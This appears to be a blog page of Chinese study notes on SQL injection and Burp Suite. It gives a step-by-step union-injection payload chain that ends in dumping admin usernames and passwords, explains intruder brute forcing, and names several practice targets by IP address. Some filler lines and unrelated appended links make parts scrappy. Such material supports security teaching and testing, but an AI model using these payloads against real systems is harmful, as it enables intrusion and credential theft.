1. sql注入原理

    1. 原理:用户输入不可控,用户输入导致了sql语义发生了改变
      1. 用户输入不可控:网站不能控制普通用户的输入
      2. sql语义发生变化:
    2. 动态网页介绍:
    3. 网站数据请求
      1. 脚本语言:解释类语言,如,后端语言php/jsp/asp/aspx
      2. URL的构成
      3. 数据请求的方式
        1. GET:随着URL传输,传输数据量较小,不能传输铭感信息
        2. POST:在请求正文中传输,传输的数据量较大,可传输任何信息
    4. sql注入的类型
      1. 按数据类型分
        1. 字符型
        2. 数字型
      2. 安数据传输方式分
        1. GET型
        2. POST型
    5. sql注入发生的位置:
    6. 演示网站
      1. https://rimovni.exeye.run/mefe/login----某CTF平台
      2. http://139.155.224.134/grade/
  2. 回显注入

    1. 回显注入的原理

      sql注入后的结果会出现到网页页面上。

      核心点就是union

    2. sql语言回顾

        1. INSERT INTO table_name VALUES (value1,value2,value3,...);
        2. INSERT INTO table_name (column1,column2,column3,...) VALUES (value1,value2,value3,...);
      1. 删 DELETE FROM Websites WHERE name='Facebook' AND country='USA';

      2. UPDATE table_name SET column1=value1,column2=value2,... WHERE some_column=some_value;

    3. 回显注入的流程

      1. 找数据输入点
      2. 找有数据输出
      3. 判断注入类型 使用单双引号、注释符判断
      4. 确认漏洞是否存在:1' or 1=1 和1' or 1=2
      5. 判断列数 1' order by 1
      6. 判断回显位置 0' union select 1
      7. 找当前数据库 0' union select database()
      8. 找所有数据库名0' union select group_concat(schema_name) from information_schema.schemata
      9. 找所有的表名:0' union select group_concat(table_name) from information_schema.tables where table_schema='grade'
      10. 找所有字段名:0' union select group_concat(column_name) from information_schema.columns where table_schema='grade' and table_name='admins'
      11. 获取数据:0' union select group_concat(username,'~',password) from admins
    4. 特殊的库表

      1. 数据库的结构:库--->表--->字段(列名)--->数据。
      2. 特殊库:information_schema----->整个DBMS数据库信息
        1. schemata--->存有所有的库名 schema_name
        2. tables------->存有所有表的信息 table_schema 库 table_name 表
        3. columns---->存有所有字段的信息 table_schema 库 table_name 表 column_name 字段
  3. burpsuite

    1. burpsuite的安装

    2. burpsuite的功能介绍

      1. 专业版含有漏洞扫描的功能,社区版没有此功能

        1. 破解版不能保证自身电脑的安全型
      2. 核心功能:拦截数据包,并且篡改数据包

        1. proxy:拦截数据包

          1. forward:提交数据包

          2. drop:丢弃数据包---数据包不会到达服务器

          3. intercept:选择burpsuite的工作状态

            1. on:处于拦截状态
            2. off:处于不抓包状态----数据包直接提交到服务器
          4. action:调用数据包处理工具

          5. 数据包状态

            raw:完整的数据包

            params:传输的数据

            header:请求数据用表格的形式展示

            hex:16进制展示底层数据。

      3. HTTP history

        1. 展示拦截数据包的历史信息。
      4. options:

        1. proxy listeners:选择代理连接信息

          1. add:添加代理信息
          2. edit:编辑,修改代理信息,选中需要修改的代理条目------>点击edit----->弹框中修改IP或端口
          3. remove:删除代理信息,选中需删除的代理条目---->点击remove
        2. intercept server response

          作用:开启或关闭响应拦截状态

      5. repeater

        1. 作用:数据包重放。
        2. 用处:
          1. 重放攻击
          2. sql注入\文件上传\XSS等绕过
      6. intruder

        1. 作用是暴力破解

          1. target展示出的是请求的服务的信息

          2. positsions:选择暴力破解的点于破解方式

            1. sniper:破解一个地方
            2. Nattering ram:可破解多个地方,但破解的点数据一样
            3. pitch fork:可破解多个相关性的点
            4. cluster bomb:可破解多个点,且多个点之间没有任何联系
          3. payloads:设置字典

            1. payload sets:选择为那一个破解点设置字典

            2. payload options:放置字典

              1. paste
              2. load:加载字典文件
              3. remove:删除字典条目
              4. clear:删除全部字典数据
              5. add:手工添加字典
      7. 啊实打实

    3. burpsuite数据包操作

      1. 开代理

        1. firefox开代理:菜单--->选项--->高级--->网络--->连接--->设置---->手动配置代理

          (浏览的代理于burpsuite中设定的代理的ip源端口要一样)

        2. 阿斯顿

      2. 大苏打

    4. burpsuite暴力破解

      1. 暴力破解的原理

        1. 枚举-----试一试
        2. 简单---原理操作简单
      2. 暴力破解的操作。

        1. 安装插件:extender--->Bapp store--->install
      3. 暴力破解的难点

        1. 效率低
        2. 对有效字典的要求较高
        3. 对算法要求较高
        4. 对设备要求较高
      4. 暴力破解优化

        1. 信息收集---社工:http://221.237.108.18:8090/tyjgl/login.jsp#
        2. 多线程

SQL注入与burPsuit工具介绍的更多相关文章

  1. RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具

    无事早上就去逛freebuf看到一款不错的工具,打算介绍给大家 RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具 RED HAWK 最新版本:v1.0.0[2017年6月11日] 下 ...

  2. SQL注入之常用工具sqlmap

    通常来说,验证一个页面是否存在注入漏洞比较简单,而要获取数据,扩大权限,则要输入很复杂的SQL语句,有时候我们还会对大量的URL进行测试,这时就需要用到工具来帮助我们进行注入了. 目前流行的注入工具有 ...

  3. [W3bsafe]分享一个爬SQL注入漏洞的工具

    分享一个爬SQL注入的工具 本文转自:i春秋社区由团队核心成员若间开发把工具放到E盘的一个文件夹 他会自动生成一个文本文件 Result.txt  最大页数 自己想弄填多少就填多少关键词 注入点关键词 ...

  4. web安全之SQL注入--第一章 课程介绍

    课程介绍1.什么是SQL注入?2.如何寻找SQL注入漏洞?3.如何进行sql注入攻击?4.如何预防sql注入5.课程总结

  5. [初学Python]编写一个最简单判断SQL注入的检测工具

    0x01 背景 15年那会,几乎可以说是渗透最火的一年,各种教程各种文章,本人也是有幸在那几年学到了一些皮毛,中间因学业问题将其荒废至今.当初最早学的便是,and 1=1 和 and 1=2 这最简单 ...

  6. SQLiScanner:又一款基于SQLMAP和Charles的被动SQL 注入漏洞扫描工具

    https://blog.csdn.net/qq_27446553/article/details/52610095

  7. 防止sql注入和sqlmap介绍

    sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...

  8. 一、JDBC的概述 二、通过JDBC实现对数据的CRUD操作 三、封装JDBC访问数据的工具类 四、通过JDBC实现登陆和注册 五、防止SQL注入

    一.JDBC的概述###<1>概念 JDBC:java database connection ,java数据库连接技术 是java内部提供的一套操作数据库的接口(面向接口编程),实现对数 ...

  9. SQL注入—我是如何一步步攻破一家互联网公司的

    最近在研究Web安全相关的知识,特别是SQL注入类的相关知识.接触了一些与SQL注入相关的工具.周末在家闲着无聊,想把平时学的东东结合起来攻击一下身边某个小伙伴去的公司,看看能不能得逞.不试不知道,一 ...

随机推荐

  1. 百度地图API开发的快速使用和大量坐标点操作【点聚合,海量点,mapv】

    快速上手 注意:本篇文章代码是基于 百度地图 JavaScript API v3.0 的条件下编写,GL版本可能稍有变化. 地图嘛,很重要的一部分就是坐标经纬度了: 经度: 英文 longitude ...

  2. 深入理解jvm-2Edition-虚拟机类加载机制

    1.概述-什么是类加载? 将Class文件从其他地方(外存.字节流甚至是网络流中)载入内存, 并对其中数据进行校验.转换解析和初始化,最终从其中提取出能够被虚拟机使用的Java类型. 用图纸造模子,该 ...

  3. Vue响应式原理底层代码模拟实现

    整体分析Vue的基本结构如下图所示:(备注:完整代码github地址https://github.com/1512955040/MiniVue) 上图中,为我们模拟最小vue的整体结构,首先创建一个v ...

  4. Shell-13-常用文件目录

    linux系统目录结构 环境变量文件 系统级 系统级变量文件对所有用户生效 #系统范围内的环境变量和启动文件. #不建议把要做的事情写在这里面,最好创建一个自定义的,放在/etc/profile.d ...

  5. GitHub自动化部署(CD) asp.net core 5.0 项目(免费空间)

    这里我简单介绍一下使用Github自动化部署自己项目到Heroku云服务器上,Heroku竟然是一个很非常老牌的云平台服务商,竟然还没听说过,网上一查2010被Salesforce收购,网上有很多关于 ...

  6. noip23

    T1 好吧,题目很sb,描述告诉你序列无限长,输入格式里告诉你m为序列长度,我:????,选择了相信后者.然后连暴力都挂分,可恶 这题一看就是个毒瘤数据结构题,思索了一下,发现就是个线段树,但我又想到 ...

  7. 从350ms到80ms,揭秘阿里工程师 iOS 短视频优化方案

    内容作为 App 产品新的促活点,受到了越来越多的重视与投入,短视频则是增加用户粘性.增加用户停留时长的一把利器.短视频的内容与体验直接关系到用户是否愿意长时停留,盒马也提出全链路内容视频化的规划,以 ...

  8. Vue 如何实现一个底部导航栏组件

    参考网址: https://www.jianshu.com/p/088936b7b1bd/ Vue 如何实现一个底部导航栏组件 可以看到父组件是知道我点击了底部TabBar的哪个item的. 实现 实 ...

  9. playwright-python 元素定位、frame处理(一)

    浏览器.Browser contexts.frame Playwright 可以同时启动多个浏览器(chromium.Firefox.webkit),每个浏览器可以启动多个page(在Playwrig ...

  10. pgsql基本介绍

    join on 与数学原理 pgsql切换数据库 直接输入 \C youdatabasename 即可 \d 表名 -- 得到表结构 select * from tablename查看表的数据 相信有 ...